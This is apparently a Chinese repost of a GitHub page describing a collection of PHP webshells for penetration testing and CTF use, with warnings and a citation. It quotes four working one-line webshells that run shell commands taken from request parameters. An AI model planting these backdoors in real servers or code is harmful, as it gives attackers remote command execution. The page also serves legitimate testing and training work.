常见的PHP WebShell,您可能需要在渗透测试任务或CTF挑战中使用。请不要在您的服务器上托管这些文件!

作者:Sec-Labs | 发布时间:

项目地址

https://github.com/JohnTroony/php-webshells

小编推荐

这个Github项目是一个收集了常见的PHP Webshell,可以用于渗透测试或CTF挑战,提供给教育目的使用。

相关技术点

  • PHP编程语言
  • webshell

项目用途

  • 收集了常见的PHP Webshell,可以用于渗透测试或CTF挑战。
  • 提供了一些常用的一行代码Webshell,例如<?php echo passthru($_GET['cmd']); ?>,可以用于快速测试。
  • 提供了一个警告,不要在公共可访问的Web服务器上托管这些文件。只有在教育目的或合法的渗透测试案例下使用。

贡献

如果想贡献其他未在此列表中列出的 shell...请先 Fork 该项目,然后将更改 Push 到您的仓库中,再在向我们请求 Pull 之前,请确保包括一个简单的 php web-shell 描述和一个 web-shell 的屏幕截图(在您的本地主机上托管)。

PHP Webshells

常见的 PHP shells 是一个 PHP webshell 集合,你可能需要在渗透测试(PT)或CTF挑战中使用。

不要在公共可访问的 web 服务器上托管任何文件(除非你知道你在做什么)。

这些仅供教育目的和合法的 PT 用例。

如果我发现任何新的 webshell,我会不断地更新它们。

FYI

对于基本功能,我推荐使用像这样的一行代码:

<?php echo passthru($_GET['cmd']); ?>

<?php echo exec($_POST['cmd']); ?>

<?php system($_GET['cmd']); ?>

<?php passthru($_REQUEST['cmd']); ?>

引用:

@software{jacques_pharand_2020_3748072,
  author       = {Jacques Pharand and
                  John Troon and
                  Javier Izquierdo Vera},
  title        = {JohnTroony/php-webshells: Collection CS1},
  month        = apr,
  year         = 2020,
  publisher    = {Zenodo},
  version      = {1.1},
  doi          = {10.5281/zenodo.3748072},
  url          = {https://doi.org/10.5281/zenodo.3748072}
}
标签:工具分享, webshell绕过, 后门生成工具, PHP安全